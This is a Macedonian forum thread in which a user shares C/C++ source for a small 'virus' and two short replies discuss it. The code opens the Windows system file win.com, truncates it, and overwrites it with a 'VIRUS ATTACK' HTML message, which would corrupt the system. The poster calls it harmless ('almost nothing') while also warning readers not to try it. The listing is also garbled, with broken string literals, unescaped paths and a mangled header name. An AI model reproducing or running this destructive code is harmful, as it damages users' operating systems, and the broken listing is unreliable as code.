• Важно
  Имате проблем со најава или регистрација на it.mk?
  Побарајте го решението на вашиот проблем ТУКА!

Vewjan (C/C++)

Coolzrock

Intern
28 октомври 2008
139
5
Мал вирус што неможе да направи голема штета.
Сепак не го пробувајте.
Ова може да се најде и тука

PHP:
#include<iostream.h>
#include<conio.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sysstat.h>
#include <io.h>
#include <string.h>

int main(void)
{
  clrscr();
  int handle;
  char string[1000];
  int length, res,i;


  if ((handle = open("C:\windows\win.com", O_WRONLY | O_CREAT |
O_TRUNC,
     S_IREAD | S_IWRITE)) == -1)
  {
   printf("Error opening file.
");
   exit(1);
  }

  strcpy(string, "<html>Hello !!!!!!! This is a VIRUS ATTACK !!! This
execution currupt your WINDOWS !!!!!!</html>
");

  length = strlen(string);

  if ((res = write(handle, string, length)) != length)
  {
   printf("Error writing to the file.
");
   getch();
   exit(1);
  }
  printf("

     Wrote %d bytes to the file.
", res);
 cout<<"

     Hello !!!!!!!!";
 cout<<"

     This is a VIRUS ATTACK !!!";
 cout<<"

     This execution currupt your WINDOWS !!!!!!
";
  close(handle);
  getch();
  return 0;
}
 
1 октомври 2008
278
9
абе убоо што гледал кодови од вируси но дали ги разбрал ?
и ако може да ни објасни што прави овој вирус кога веќе го постирал. чисто информативно поради наша заштита
 

Coolzrock

Intern
28 октомври 2008
139
5
Скоро ништо...Мал вирус е.
И точно дека јас не го направив...
Каде пишува дека јас сум го направил па викате не го направив :zbunet3::zbunet3::zbunet3::zbunet3::zbunet3::zbunet3:
 

Нови мислења

Последни Теми

Статистика

Теми
44.216
Мислења
918.949
Членови
32.878
Огласи
1.032
Најнов член
Gorivko
На врв Дно